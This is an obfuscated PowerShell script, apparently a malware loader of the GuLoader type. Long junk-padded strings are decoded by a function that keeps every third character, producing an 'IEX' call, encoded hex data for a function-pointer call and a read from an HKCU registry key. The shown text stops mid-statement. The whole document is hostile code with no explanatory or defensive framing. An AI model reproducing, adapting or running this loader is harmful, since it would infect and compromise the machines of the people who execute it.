An'SvEGgBSaDDu1BiFNo5ZyDRi7JoCAnABiDSp1UsCMu0FiCSe6giDpo1ReFEg3SuCFoCKvDPe7InDRe1CoDDe0InCRa4BoCNa9UnEAp8DaCSh0smCBl8LoCGaASyDKa7AvDNiCDi'Br;Kn`$MaGSohLoeDigThifosPohSe7Br=MiSBomDiePlrSptClePenGasWobPaaPtrSlnUnsRe0Ld Mu'udETiCFaECo0DiFBeDUn'Fe;Ap`$LeGKrhMieurgGoiMasTuhHe8Op=KoSBemRaeMirfrtRheOhnClsMubLaaOmrFinvasRe0Ro Vi'grFFr9Tr'Cu;MefDiuNonAacCltyoiYooNonTv ShfSnkGypto Ho{UnPPoaGurMoaHomHy Un(My`$RyUOppAfgGarfooTewEknAc,Va Fi`$ApDafeLapSprMyeFesLosthiRioEknHjsUnpimeSerBuiStoWhdmaePrrbi)Im La Ma vi Re Kr;En`$InHUnoRoeGtrFieFrsKo0Na uf=TeSSpmGoeAdrTktmieFrntosbebFeaRirVenansLa0Bi Un'Fe8Jv1SwEChEunDPo7DeCRe8WhCSm8CeCSy0UnDEx7OmCMe0SaCKaBSu8Sy5Ud9Vi8To8in5Pa8anDFlFReEGuEAf4IcDLa5knDpo5RaECo1prCViAEnCFi8CiCAr4ViCWoCDyCSeBVaFAr8st9VaFZo9UdFCaESc6FlDKl0coDUn7KeDFl7CoChy0BrCUbBPaDBo1UnEve1DiCBiAAfCFl8SaCMa4vaChaCFaCSyBHe8EbBJuEAt2UoCPi0AeDNe1unELa4InDKa6MiDIs6FlCAu0UdCPo8NoCTi7AlCHi9UnCTeCUnCTr0FuDMy6In8liDDa8opCTe8Tr5SeDPr9Er8Bu5VrFDi2ArCLaDFuCBu0MeDPl7snCDe0Br8Ph8PaEReARrCSe7TaCflFSiCRe0UnCBl6UsDTy1Ma8Ho5GeDdrEFo8Bi5Pu8Te1AnFKoAGr8PeBFoEwo2ReCSp9TiCBeAAlCOp7EnCSe4PrCSv9SkELi4deDLo6NeDSu6OrCSv0EkCFo8faCDo7UnCOu9OpDHeCCoEIl6MuCBa4DeCNe6ClCToDCoCCe0Di8Ne5Im8Ne8AdEOp4LiCCaBLaCIc1Ko8Ku5Br8kl1moFShATr8KuBTaEWa9unCSvADaCBe6ThCKo4CoDFr1SiCOiCStCBeAJeCTaBAl8SyBwiFBu6MaDSt5PlCIs9RtCHyCTuDWh1Sp8svDPa8Co1CiEBe2LiCReDDeCNe0MoCFe2TyCBlCMeDPe6TrCRvDPo9NrDSu8StCLiFKoEde8Ko8Ac9Ta4RuFIn8Ma8fiBRyEPr0ToDSk4LiDme0ReCRe4PaCBa9AdDSk6Ka8ErDSp8Un1SeEPr3EyCcrAAvDFa7SpDUn6AeCCoEUnCKoBPrCReCReCOvBFoCBi2SuDTr6PaDTe7CoChu0LoDco6AaDVa0NoCEn9BaDSu1MeCSt4PaDMo1ChCBr0OpDJo7KuDCo6Gn9Ma5No8NeCTr8De5AnDTe8Dy8StCFa8PrBSeESn2CaCVi0EvDVe1KrFPo1InDPaCSuDHa5BiCSt0Su8AnDTa8Om1SkETy3KnCCoADiDBo7OpDBa6PaCDaEbuCBiBTrCPeCInCOtBOpCVa2UdDEf6ReDCo7BaCte0GaDSo6KoDOm0LeCRd9FoDDe1CoCSm4GaDDe1IrCOi0NyDLi7ElDFa6Li9Ov4Cl8AnCFl'Kr;Li&Bi(Ud`$BeGPlhFeeFogReiInsRehMe7Cu)Ep No`$TuHVaoBreSirDaeAmsSv0Un;Un`$IsHRuoFieFnrPrevisDi5Un Lv=St SlSStmHaeBarSmtCheSinShsBubchaBorHenPlsSp0Mu Se'Be8St1caEsu6BoCBeDViCudCPsCDi9FaCMe9En8Us5Un9Pe8So8Li5Pe8Ua1FoEUnEChDNd7OkCSv8SuCAm8RyCFr0UnDDi7SoCLa0PrCAtBTr8DoBSuESy2OuCSn0CoDFl1NrEKe8SpCBa0PrDIn1MaCTeDSeCSuAScCSa1Me8GaDTh8Es1FrEEm3YoCBiADaDbo7RuDPy6OsCBeEOpCSaBTrCEqCTjCBaBLnCHj2TrDDi6tuDPa7UrCEg0HeDEp6HaDKu0BaCPe9PrDUn1DiCTa4SuDMy1ReCKe0MaDTe7GjDIr6Di9Co7Bl8Fi9Bi8Di5ShFBiEspFKo1StDSlCCoDLa5UpCTr0spFEnEWeFUn8bgFSp8Pu8En5joEDi5De8RuDSk8La1SoEin3BoCklAToDCh7DyDDe6CeCOlEToCWiBPrCTjCYuCRuBStCFr2UnDKr6SrDNo7EnCHv0FeDJu6LeDDi0FoCBi9DeDRe1StCIm4HaDBl1GuCch0VeDDy7ToDPr6Ar9Pr6Ta8be9de8Su5Re8Pn1PaEMe3NaCApATeDCa7OxDRe6GoCAnEMiCMoBCaCNoCUfCSpBovCAn2spDNe6ByDCh7GlCMe0SuDSy6FlDRe0KwCno9OvDDe1FoCRe4noDBr1AlCUn0HiDRe7LoDor6Ru9Ek1Un8TwCIn8ViCEy'Ri;Or&no(Li`$HeGSkhJoefigFriGussthMa7Io)Ve Ty`$TyHReoDieCarLieSisAt5Li;An`$LeHAsoCeeForDeeAfsSi1Ud Pe=Da UnSChmSeeRurFetFieNenBesVibKoaagrvinOvsEx0La Hj'UnDFr7meCBe0SuDFi1SeDRe0FoDAn7TaCTrBIs8br5Pe8Di1AfERa6StCAfDDaCFoCTrCMa9UnCSp9Fl8PoBBuEwaCLoCHuBtrDVe3OuCGuAKvCMeEGrCUd0Sl8FoDOm8Hj1SlCTeBbyDIl0TjCKo9SaCAr9Vi8Un9Fo8Ad5EvETr5St8SiDunFToETvFfr6HoDRiCNaDRh6SeDno1AvCBl0UrCSp8in8TaBReFNe7FoDCr0DeCRoBTaDBe1BoCShCSqCOs8BeCSo0Po8RaBImEOvCAfCFoBReDMa1gaCRy0KoDCe7PeCMyAMeDSv5SpFRu6TaCNi0OdDAs7PlDRe3prCAmCRaCTa6SyCAn0ByDDi6Sj8noBReENeDUnCAa4UaCPiBHeCHa1DiCPa9CaCPa0GaFAn7SaCUd0PaCDe3HaFSt8Ex8ElDBiENoBShCnu0ItDBy2Co8Ac8SvEHoACyCfr7feCstFTeCEn0SwCGe6ViDBu1Di8Ti5ThFTe6HeDDiCIvDPl6AcDKs1CrCSu0EcCQu8Fo8gnBLaFCh7PrDGa0BoCNoBNeDKb1PrCDoCLaCpr8QuCbr0Je8NaBFoEWoCInCFaBReDha1emCMo0PaDMe7TuCShAKrDLa5OmFAl6SpCNe0ChDBe7BeDRe3MeCFiCIrCBr6CoCCo0ThDUn6Re8SkBUnEnuDOmCCo4AlCNaBOmCRe1WiCid9LoCMo0BoFSy7NoCCa0unCSt3Av8SiDde8EdDUtEKaBEsCKa0UnDav2Hu8Su8udEBoAJuCBu7VaCUlFOvCPe0EnCUn6KiDTr1Al8Ra5MoEDaCGyCSaBTaDBd1HjFKu5UnDHo1SkDKa7Au8FoCVe8Sp9Ua8Ir5In8PiDKo8Lo1UnEorEpeDMo7HaCKr8AfCTa8NoCPo0IrDes7LaCDr0RaCDeBSk8AtBShESc2ArCOp0BrDam1AbEKb8MaCFo0HeDLe1saCplDPlCPrABaCKa1Ho8BuDAf8Dy1CaEKa3SpCSnAekDel7SuDDi6AnCTeESaCBuBUnCErCSaCTrBEuCPa2InDPl6EnDOk7ToCSu0ObDRa6alDAf0PrCVe9ItDSn1ByCKo4clDAb1PeCAp0HeDMa7UrDdi6Af9Sp0Ra8TeCFi8UgCse8InBMeEAbCMoCHnBUnDRe3UnCSvATeCReEMeCBl0Re8BoDHe8Fa1StCtrBbeDDo0BeCUn9KiCMi9Fa8De9In8Sn5BeESt5Ea8OvDHa8Br1udFSp0HeDGa5GuCIs2LeDSi7DjCPoAsiDHe2OsCRiBUn8SaCEl8ouCRe8AnCSp8TrCDo8Ka9Hj8Jo5In8Pr1TyESm1MiCop0ViDAs5afDGr7ExCPl0AuDAc6PhDPr6CoCfoCKlCTuAUnCSnBcoDTh6ToDBe5UnCUn0PuDBr7ClCUnCFuCDeAArCMa1SeCTi0VaDTi7Fr8spCFr8MeCpe'Af;El&Ag(Ov`$BeGLahOpeChgHuiSksPrhFo7El)Se Eu`$UnHNaoEmeNurLyePasIa1Bu;Pa}DefTouRenDacAmtMaiKaoBanJe SkGDiDHaTNe aa{KaPslaJurGtaFamHa Co(Ej[SaPOpaBarSiaBemCaeThtSteoprHy(BrPUnoAnsFyiSetafiMeokinOr Kl=Sk Re0Ph,Fi FaMImaRenMidCaaCatFooKrrdkyHa Mi=Sp Su`$PeTBerZauEmeUd)Mu]Oo Sq[BeTPlybapUdeAg[Ko]Me]Av ti`$SkNTroBenFodSmeVecSuoHarAmoPruRusFrlBeyHj,fu[EwPflamarUnaTomFaeSptImeamrAu(SkPChoTosphiUjtPriRaoDinCa Si=Tr Ga1Bs)La]Ta Dd[DrTExyGipFeeEm]Me Na`$ReCunoNoeIblIniKooComFoyNoaAulgrguniDoaSk Ma=Hy Is[PrVBloCrigldNo]Bu)Au;Ma`$AnHMioSeecarPreKasKo2ex Im=Va JgSNomNoeTorDatboeAnnUnsUnbakalyrTunfrsKl0af Lo'Ne8ku1MeEFoDchCac4diDSaCBeCNoBBlCBa0PrDZa6Fo8Br5Se9Bo8Fa8Un5LdFPrESiEFa4AnDmi5HeDWe5WaEHo1PrCReAOpCYa8HeCIn4ReCBoCPeCEmBFrFSt8An9CoFUn9SpFSlESt6neDOl0AuDfl7InDOa7JeCSk0FaCUnBCoDTo1GrEsp1SnCLaATiCSo8DaCNa4EmCUnCStCcyBCy8RaBStEFl1ReCSe0PhCRa3PiCSyCStCKoBVaCSa0AuEJe1AiDEmCThCSnBVaCJu4BeCEx8ReCSoCPlCCi6BoEVa4HaDFe6KoDFa6UnCit0KeCTi8HaCWi7GrCUd9GrDDoCMo8VaDCa8rgDToEHaBLaCSu0DeDSt2Ln8ne8PhECrAPeCja7PhCsvFChCSt0ChCBa6AuDMa1He8Sh5UdFLo6SoDSaCtyDLa6PhDSy1TrCKo0HaCSp8Gu8InBSeFPe7CrCKk0DiCEm3siCSo9ReCEg0DeCSa6maDBl1VaCCaCBuCObAKrCUnBBr8CiBLtEDr4FiDIc6TsDIn6RuCCa0SkCSy8UrCGe7WoCWe9BrDCeCStEBlBAmCCo4BoCUd8WiCSk0Ch8UdDTi8Hy1OsEUn3FlCFlALyDBe7KrDsk6baCOvECaCPrBOvCUdCAnCReBUnCSr2SuDBa6CaDCo7ZoCBr0GaDDe6yoDRe0BaCUl9YaDFi1DeCBe4ReDAr1AlCAn0OrDUv7UnDsl6Kl9HuDMe8FuCCy8KaCBr8na9Pr8Hv5FaFBeESaFar6EyDGiCFrDHa6LaDmu1ReCfe0ruCUd8Ko8FaBKaFme7UnCUn0AfCAn3GlCKo9KoCMa0GoCRa6CuDSl1InCSuCHyCUnAcoCFjBEs8BrBPoEKo0vaCFl8MiCOpCSkDGr1Me8SoBMiETh4AlDTo6CaDco6maCwa0hyCpo8phCos7ChCFe9GrDCaCInEAt7foDPa0PrCNoCSkCKa9ArCTj1TyCSu0DiDCr7DiESh4UpCBe6UnCTe6StCSy0adDHa6SkDSu6NoFBe8po9InFBe9SnFBaFEl7ReDbr0LeCMiBPi8UdCDo8ReBNoEUm1StCAp0peCAm3AmCMyCpaCTyBAnCLa0FoEIl1DeDStCOpCSlBNeCWa4StCKo8VoCsnCbuCUn6OkEEn8FuCOrAOrCLi1nuDSr0DiCBi9PaCOp0Su8CoDDa8Ta1ReEKu3MyCheASmDTr7MuDAr6SaCSpEPiCErBStCdaCStCSkBMaCIm2ArDAd6SeDSp7MaCKr0UnDFy6EcDGo0PoCSu9ElDEn1GlCSn4TuDAb1DiCMi0foDOv7MeDIs6Ma9MeCBu8Pr9In8Uo5St8Ly1KaCDe3WaCMu4CeCDr9BaDso6UnCSe0qu8DeCOt8EmBKeEAt1HoCFa0HeCKa3krCBuCBaCSeBHoCAu0DoFVr1MoDOvCLoDDi5OvCMe0Pr8SeDKa8Pr1OdEBl2SoCatDBrCCu0InCTi2foCDeCUnDUn6UbCLyDMi9Di5Sm8Pe9St8Gr5Su8En1DaEEo2FiCBrDVaCga0miCCh2BrCAdCkeDMe6OuCPhDCo9Wi4Ud8Fo9In8Un5AnFSpESkFTy6InDfaCFrDTr6AsDGa1PeCIn0AbCTe8Te8IsBAmEFe8PuDOu0JaCOp9BeDBi1vaCPrCNeCAs6NoCYe4puDGe6PoDdk1ErEma1NeCOv0BuCDe9hjCKo0EnCHj2GaCJe4LuDBr1crCAf0AsFSv8Sa8InCMg'Tr;An&Vi(vu`$paGEqhsoeTugAdiTrsNohPr7Ad)sm Hu`$BoHCooBoePrrCaeSvsSy2La;Pr`$AtHDroLaeAlrUneKasSp3Re Ru=Ps LnSKomSaeTirMytHjeKonEasFobOxaRirBlnTasTa0Gu Pe'Ti8Ar1CoEStDBeCst4ReDgeCLaCOsBExCUn0RkDMo6De8DyBGiEDo1SeCan0DiCUn3TrCurCAuCOvBSyCGn0SiEda6DaCMiAMoCUnBUnDQu6UnDBe1IsDBr7GaDTu0noCha6HvDBr1ReCTaABoDAx7St8GhDRi8Me1MaEWa3SuCSyASaDTy7KoDMu6BoCSkESyCFoBScCFaCIcCPaBToCin2CaDCh6KlDAn7MaCFo0VaDCl6koDMu0UdCel9AlDUn1ReCAd4BaDLu1GuCBr0FrDMi7KoDUn6Re9To3Op8hv9St8Fo5DmFKlESaFBr6FoDUnCHyDCy6RaDpe1HoCro0SpCPr8St8DrBBoFGa7haCTo0MuCMi3MoCbr9CaCSo0SeCWe6GrDAn1MoCWiCShCEnATiCEsBOo8ElBTiERi6ErCPr4BeCAs9AnCDi9MaCBiCLoCFoBStCIc2UnEDe6SyCOvAAnCStBSpDkl3DrCSt0RiCTeBPaDIs1ReCDeCScCsaAKvCSpBIlDHe6GyFps8pl9AdFCa9geFAcFEg6SvDLe1HeCLo4VaCUnBYaCLe1FrCCy4MeDSe7InCPl1Ba8Di9Of8Pe5Sc8El1PhEKaBAvCLiABuCefBOfCSo1udCGl0FrCta6BeCSpABeDLi7alCSpASuDSt0HoDFa6BlCCo9TiDSuCPo8JaCKo8AaBTaFCr6SmCDo0DrDLi1GrEgrCBlCSp8PiDBe5VeCMi9SuCMe0elCGr8beCSt0NoCOxBSqDKv1CaCSe4VrDco1JiCLeCdrCSwASuCSeBFeEMo3RuCCo9InCLu4SoCKr2KaDTi6Sh8StDCh8Sa1NoESk3BuCChAaeDHe7IvDSk6FaCSaEReCRoBruCLoCnoCCuBKrCSp2PaDCo6SoDSa7IdCre0EjDka6AxDUn0SeCSu9CaDBe1JoCNa4HeDRu1NoCge0SpDIn7TeDno6Bo9Sp2Lo8ThCVr'In;Fr&No(Cl`$MiGorhtweStgTeiBysFahta7Ph)Ha Be`$coHNooIseRerGreDusPa3Se;Uf`$AfHHuoSceUnrSaeResMo4Su Ma=Re PhSSpmBaeFarTrtaeeScnInsInbIaaThrAnnResUn0Ev An'As8Tr1MaEYnDOpCGo4HeDUdCSpCGaBraCMa0HaDBy6En8VaBPoEBo1miCMa0SkCLa3PhCKuCDrCVeBKoCPu0StEOm8MbCFo0SaDHo1CoCMeDKoCAdAUnCSw1Fo8EfDGr8St1KlEUd2MuCHaDDeCpo0NiCFo2AfCStCViDGr6TeCSmDEr9Br7Co8Al9Ro8ch5De8di1AdEUn2SoCUrDEuCPo0BlCpi2CiCLnCTiDre6BrCAmDNe9Mi6Be8Bi9Es8Kl5In8An1DoEBe6MiCInAShCPa0MeCBr9BeCSiCBaCSmAAfCmj8KoDPrCSlCTa4ViCUd9BrCCe2weCPaCGrCBr4Dr8Sk9Tr8Un5Ch8re1PrECuBGdCHeABeCSmBMiCde1GrCSt0ZoCNe6PuCBnASkDFe7GrCHyATvDFo0InDNo6anCCy9EjDRiCFl8ToCTo8RiBAmFMe6FoCGa0VoDTa1DyEPoCanCCo8BeDBr5LyCBo9SvCPu0SyCTa8MiCCa0KoCStBKlDGr1LuCAs4ReDNo1CiCNsCLaCStAOrCunBEgEGi3ReCFi9TrCBe4unCFr2MaDOb6Ex8CiDSc8Ha1NoEUn3enCBrASlDMr7klDUr6BaCHaEMaCBiBLaCTaCMiCKoBDoCHa2PrDSl6KrDLe7GtCCo0ApDSy6FoDKv0RyCBi9DiDFr1RaCTu4PuDFr1TaCFo0ApDSu7GoDWe6Pr9In2Mo8BuCIr'Sn;Ma&Se(Fy`$OuGdrhOpeStgVeielsTuhNo7De)Hy Ph`$EfHPeoDieOvrbueHysSh4Gr;Ej`$JuHAnoBaeGrrkoeGasTa5Ca Ba=Lu UlSfrmBreHorAftTieWrnLisPlbBuaMerShnTrsKv0Ko li'OvDPe7InCrg0OuDDi1AlDTr0ApDRe7AnCAfBIn8Sl5St8Vi1PrEExDskCHa4OpDHiCLyCStBNeCSa0SaDSt6Rg8DoBDiEFo6ViDMo7DyCBo0PhChj4YaDTa1ubCSk0KnFUd1BeDhjCDuDLi5StCSj0Ov8LeDDe8KrCHa'Rg;st&An(Ko`$StGafhBoeOpgOpiFosBrhKa7Re)Sp ol`$OpHWaoPeeZarMueFisPr5Co Se Kn Fa;Le}Fo`$faURenLocFrobruObpAilHaeEn Aa=Ko FrSMomobeAbrDitBreManMasDebfoaAbrInnFesKh0Ke Ve'ReCGsEEmCte0MuDun7YoCArBUnCPa0TeCGo9ar9Ar6ra9Af7di'De;Gr`$PrHUnoYoeEfrAdeKosPl6Sy Gr=Du MaSplmgeeBirSptUneFrnPosFobSoaDirDynAfsJu0gr Tv'Au8Na1EtFBr2LaCFl0koDTr7DuCCa0UnDSk7CaCPl4brDFi1Br8Ba5eu9Ut8Dr8Gu5fiFMaEdaFFi6ToDBeCVeDWo6ChDme1VoCUn0ShCAi8Sl8UnBAnFMb7InDDv0DdCTiBEnDPu1LnCMeCGaCdi8VoCKo0Ek8saBStEinCauCGeBGaDNo1ImCPh0BoDBa7PtCOsAChDSp5SkFMa6BrCTi0SkDFl7FiDFl3WiCUdCTrCSp6DeCRe0TaDKe6Ma8s BExECa8PrCSw4TeDFo7IdDFe6PaCLeDSoCVi4DiCRi9FaFGe8Sq9TuFHo9MaFGoEsa2FuCAl0LeDSj1InEHo1CoCSk0BoCPa9UnCAf0FuCpa2SpCCy4AfDup1BeCOv0FjEgu3TrCOlAUnDNo7acEKi3JoDWa0NaCDaBBaCSe6PrDSa1BeCfrCHiCudATrCSoBMyFPe5OvCMeAUpCGaCVeCopBPaDLu1UsCde0FlDhu7Sv8VeDBe8UnDBuCUg3GuCAfEHyDPi5Ur8Ne5ls8Mb1FoFAk0StCkuBWoCAa6TrCBaAUrDDr0MoDFs5MeCJu9GiCUn0Di8Of5Gt8Sk1BiEPr2DdCUdDHyCKo0UnCEu2ExCAeCSeDBl6ChCTiDQu9Dr1Ab8TeCPr8Cr9Go8As5Pl8OvDDiEPe2SpEIn1ScFEn1Wo8Va5KaETr5Ca8OmDGiFstEinEJaCUnCScBDiDUr1syFAn5WoDSt1KoDbo7ReFPr8Ln8Co9eq8Pr5ImFPrEHyFAc0ExEReCAmCsiBCoDFr1Ps9Be6Pi9Ti7VaFMi8Pa8Ov9Po8Mu5BlFPeELsFDe0MoEapCHvCAmBBlDOp1Ek9de6Ge9Un7TeFTi8Op8Ex9In8Hv5HaFSnEGaFHj0exEFiCcoCSyBSwDFl1Vi9St6St9St7RiFNr8Tm8BiCLo8Sk5Un8BaDLaFTrEReEdoCStCBiBMaDTr1AcFSi5BoDDe1NiDCo7BlFSa8Hy8SpCSe8ArCBi8EdCHi'Tr;Fe&In(na`$InGArhCaeungiriElsUnhSh7Ju)Om Di`$AmHeeoFoePrrAdeRusVi6Po;Fi`$ReDOkmEdnEniMonSkgMasFopPrrCyoLajEgeBukBetTrebarCo In=Ch FofPrkBapha Sc`$ReGGehIneNagIliPesNehPr5Un Re`$HuGObhBieStgKviNosFohPs6Re;La`$EkHreoFoeTirBoeGasPu7Sv Re=Ch KrSTemPreIkrUntVoeGenPesDibToaUtrSanHjsAp0Fo Or'Ri8mi1GgFHd6PrDSa0MeCSyEPaCseEInCde0CiDRh7KrCCoALiDGe3FiCfr0ShDEn7HyDTo1DrDIn7BeCCeEReCKaEReCSo0SkDti1AfDAf6Ta9Ov6Le8Ud5Et9Fi8Sp8ka5Dy8Yo1JoFSp2FoCSy0HoDIn7UlCMa0BoDSi7reCSe4DaDTe1Fl8TiBVaEIfCCrCKaBTrDPo3opCUvAHeCLaESeCSq0Un8TrDUnFUnEOrEReCBaCPaBvaDRe1beFNo5KoDPo1RuDEl7ViFBu8Fa9PsFEt9TeFToFcoFSpCKo0OvDSc7BrCOuABa8Ur9Om8Se5Un9An6Re9Fa0It9LtCMe8Se9Sl8Fl5Me9Pe5SkDUnDFe9Va6Pa9Kb5Kl9Bo5Ha9Fo5Pu8Sv9Bj8St5Un9Ci5PuDLaDQu9Co1Po9Ud5Va8TuCTi'Ch;an&de(Fa`$UnGCohAneLagOpiThsObhUn7Sn)Al Di`$GaHFroEneHorVgeTasSt7Si;Ha`$TiHOvoLaePurPaeGasKo8Ti In=Ha DrSKumNeeHerHytSheDenHesHobEkaArrPenRisDi0Co Af'Pe8St1UnEPa6CrCstABeDIn7seDPa7ClCWhAKeCTy7NiCSe7KvCMeAExDth7BaCDu0UnCSe0Sp8An5Ga9Pr8Ud8Om5Su8ga1QuFFo2leCSe0TeDGa7BoCRa0BeDWa7SpCSk4IgDUn1Ca8RiBafEKrCUtCJuBSuDTi3PrCRuAAsCTrEEuCSk0Un8DeDMoFSoEKuEEsCOmCCaBSuDDo1CoFBi5UbDFl1MoDUn7InFIn8He9HaFFo9DeFmaFChFErCPr0SaDPo7AlCFrAWa8Bi9Ta8Ch5Ap9Sl5KbDKiDPh9Te4Fe9No5re9Bn5Lg9Sl5Ow9An5Sk9Gy5Es8Am9Va8Su5Au9Bu5etDLoDPr9Pa6Or9Af5Fi9Ru5Ca9Ca5Uu8Si9Sp8At5Ha9Un5KaDBaDTu9op1De8tiCFl'Re;Ko&Sh(li`$NaGAnhPeePrgCoiHusSphUn7Sa)Ro Hi`$TeHstoSpeHirLaeBesSa8po;Un`$PrCRuaSyrNotLawVorThiStgCahArtUniGenFlgBe=Pa(SmGUneIntCo-OpIKltpeeTemWaPUnrSooInpDoeAgrSotKayBa Ma-SePbeaSptRehOx Bi'GoHPrKNeCPlUBi:Fo\LyPBasUdeInuRadSaaFemhobGauOnlLoaTpcParStualmSk\CykVeoRenFesXmtSqiAntSeuSttTaiUtoLunLseJelFe'Ge)Di.WaBTijHgfHesFo;Ly`$InHFloHoeMerSkeAasAn9Bl Op=Pa HoSJvmBreNerSktNoeJanKrsPabHeaTrrronYosUn0Af St'Ha8Fo1PaECuDSwCMeAFiCHe0AcDCe7ReCSe0MiDSt6Rg8Wa5Af9Mu8Ob8Pi5NoFVaEInFIn6UnDseCTuDSp6DaDWe1ChCNu0MiCGu8Ku8DeBNeEUn6AlCPlADeCSmBExDCh3PeCEv0SeDKa7crDHi1ToFTe8Sk9RdFAn9PhFFrESa3DrDAn7CeCImAHaCAn8MaENo7unCFo4UnDsk6BaCFe0Re9Ti3Fl9Fj1KaFAn6BuDSy1EnDDo7FrCLaCPoCBlBSkCPr2Re8EnDsy8Ln1AdEPi6EvCLa4kjDSl7TaDPa1OtDFi2PsDLa7NyCVeCSaCMu2SkCBeDBuDji1SkCEfCviCJaBSpCPr2Op8TaCBe'Bu;ha&He(Mi`$esGAnhNoeBlgChiShsLohFo7Sh)Ja St`$WiHMeoLaeBarBleHasCo9dv;Ty`$FrCGoagerSotFowDerLaiHagmihbetkoiPenSsgAn0Bn Ba=Ca ChSSamLoeAcrNatdueApnpasSabGaaGorBonSvsPr0Ya Bi'PoFCeEElFag6EkDDiCRaDCo6TeDAl1OvCvi0MeCRe8Sk8UdBAlFEl7FoDBl0CoCAaBAnDTr1PrCTrCFoCHe8TiCHu0or8UnBHrEstCKeCCyBTeDBo1VrCIn0meDPu7AiCItAPrDTu5RuFBe6FuCDe0FlDAn7OuDSl3LeCMaCPiCDi6DiCSo0UnDBo6Ve8syBBrEMe8EpCZo4StDSe7SaDSl6PeCElDDeCEl4HeCMe9KoFPr8Op9unFWo9GlFBlENu6FoCPaASpDma5ToDRuCSt8FlDAu8Pa1GaEOuDcuCEkACaCBu0IvDLi7KrCEl0GeDAb6Va8Is9Fa8Pa5Ko9To5Pa8Ol9Hy8Sm5Se8Ta5Fu8Be1DrFFu6MdDOv0klCUnEDiCUnEArCLi0PlDTe7trCGiASlDBa3AgCSt0puDAr7SeDCe1baDPy7prCKlEfeCJuEElCRd0TaDBa1GiDUd6Af9dr6Pe8Fe9Ja8af5Ga9Ka6as9Im0Po9AnCPa8MaCOr'in;Tr&An(Ud`$GaGWhhFleFlgReiOpsSchSa7Ov)sp En`$PrCPraBerRetSuwLerSmiUngPrhHatUniDinIjgSt0Ov;pr`$NeNMaoSonOscStoStnCrdGoiEnmEneblnSytGo2De=Ub`$LiHUloTreDirSaeFosUn.WecFioLauAnnOutMa-pi3Sm5Re9Ur;Sk`$paCBeaTorFotExwSirYaiSngmihGatKoiBankngTr1Em Ba=Bu UnSMomSgeSurRetRueFanCasTwbAmaFrrGanSusBi0St ar'AuFKoELoFev6AsDHyCNoDNa6UdDNi1BaCSt0WiCMu8Ve8ClBmuFPy7UnDBu0HyCemBStDPe1GrCopCpaCCa8CaCSc0Re8LsBHuESaCWoCPlBDiDHa1CoCpa0HiDMy7NoCSpApaDUt5CaFBo6DiCAn0MaDDe7SeDFi3UnCreCHuCBi6sqCPl0MoDhi6Ou8BuBSaESe8ThCPr4ViDKu7SnDCy6BeCNoDLaCCh4MiCFe9NiFPa8An9TaFPo9KaFReEFo6SeCWhADoDOu5NoDHoCPe8ReDTr8Sp1DrEvaDNeCbyAFoCCa0spDAs7GiCSp0UnDTo6Sk8fj9Sa8In5Ge9Sa6Fe9Ur0Th9ThCDk8cu9Co8Ba5Ov8Su1LoEDe6ruCOrApiDkl7CoDDe7SuCbuACiCHy7afCHi7GaCLuAEkDTu7UnCPi0PrCEk0Pa8Pi9Un8La5st8ud1SkEAnBChCEnASkCDoBTmCVa6ViCTeAJuCFaBVaCSt1KaCunCKiCaf8MoCMa0SeCMeBPlDSh1Et9be7In8RoCHa'Vo;Mo&Br(Tr`$FlGRehReeAigFeiTesgahPh7Wh)Fo Sh`$TeCcoaInrRetUdwForEfistgYahIbtspiUdnFagSo1St;Ed`$FrCPraNorSmtPewStrKliBdgKohCotEniPonFigAn2ba St=do stSPrmUneimrRetAdeClnStsKobBuadirDinHosDi0Tr to'Su8Br1AnCRoEfjCNo9VuCSa4MiDZo7StCFl2UkCWeFPrCSkAStDSl7WiCUn1BoCMi0Br8Bn5He9Sk8Vi8Ka5BaFInEBlFAj6InDDoCudDCi6AnDSl1InCSt0InCSy8Le8AyBTiFce7AsDNo0DeCImBAlDNo1NiCBiCSlCTi8VoCSe0Fu8ReBGaEnoCDeCOmBChDMe1TeCMa0BaDus7KeCPeAWaDFe5clFFo6BuCLa0ReDDe7NoDJe3StCHyCAlCSt6SkCDi0BeDMe6bl8AnBkoEEt8AfCAc4TiDBa7DrDSt6AhCSkDGiCLi4NoCFu9AsFSp8uj9ReFDi9RoFSuEBa2ApCKo0unDGr1HiEFi1GrCGu0diCPe9KoCJa0DeCFr2ReCUn4phDmu1DaCEp0MiEDe3ubCJoAReDbl7vaEma3SkDBa0ToCPsBSkCTy6reDPo1GhCDeCMaCTeASkCTiBUdFFo5UnCWeAEuCHoCLaCTrBAnDEr1AlCMa0ThDCh7Hi8coDfo8un1GeFTr6KeDAd0PaCPeESkCBoEhaCEk0noDRe7AeCPeAMoDGu3UnCTe0DiDim7RaDCa1HeDud7PeCTiEInCCoESiCMo0NoDSh1JoDBu6Oo9Vi6Ha8Cr9Ro8An5Tu8UvDinEKo2VuEAr1ouFLe1De8Co5PlESy5Se8CaDtaFDyEFdERvCBaCPhBBgDTo1PuFKa5UnDla1UlDJo7ToFSu8An8Sv9UnFSpEMeEDeCRaCAfBKoDAp1AfFVe5beDUn1UnDAl7DsFSc8Du8CoCLo8Ca5Kv8SnDFrFCuEElFQu3HeCPaAPrCRoCTrCIn1HaFTa8Ma8BiCIt8GuCOv8AbCMu'He;Re&St(Gr`$SpGSihBeePrgSpiFasTehJu7Ga)Gr Un`$ChCtralerHotRewUnrTeibigUnhEstSkiNonStgGa2gu;Ma`$BiCPiaUnrUntOuwAdrUniUngElhTitDiiStnMogDa3Fl Br=Li TiSCemSaeAsrBotmaeRenDesgebkyaMorFlnStsHj0Sy Mo'Gr8Wi1saCReEfiCTy9TuCTi4TiDpe7riCDm2TeCOpFMaCFrAKrDSe7GrCKr1CiCIn0Le8BaBTaEMiCcoCKrBKeDFa3DiCBrAkaCTrEBrCFu0Hj8DiDAp8Go1LoEje6ReCOmAVeDKn7FoDBo7ReCGbAOnCDe7SlCOp7HaCRaAFeDQu7PsCMe0GrCmy0Sk8Si9Ko8Et1MaEac1NoCPl8BlCBrBTbCGaCFoCVrBCoCUn2BiDPs6HeDBr5ZoDAc7WhCChACoCSpFLsCGh0BjCUsECoDLa1stCma0inDSp7Gl8SaCMa'Di;Ph&Bi(Al`$DeGAmhGreGigSkiAmsFohSa7Me)Mo To`$FaCShaMarSvtFlwDirKliBrgMahcitnaiTrnFogSu3Ta#Ga;""";;Function Cartwrighting9 { param([String]$Regionsplanlovs); For($Klistringer=2; $Klistringer -lt $Regionsplanlovs.Length-1; $Klistringer+=(2+1)){ $Smertensbarns = $Smertensbarns + $Regionsplanlovs.Substring($Klistringer, 1); } $Smertensbarns;}$talose0 = Cartwrighting9 'CeIFoEReXPr ';$talose1= Cartwrighting9 $Vildmnd;if([IntPtr]::size 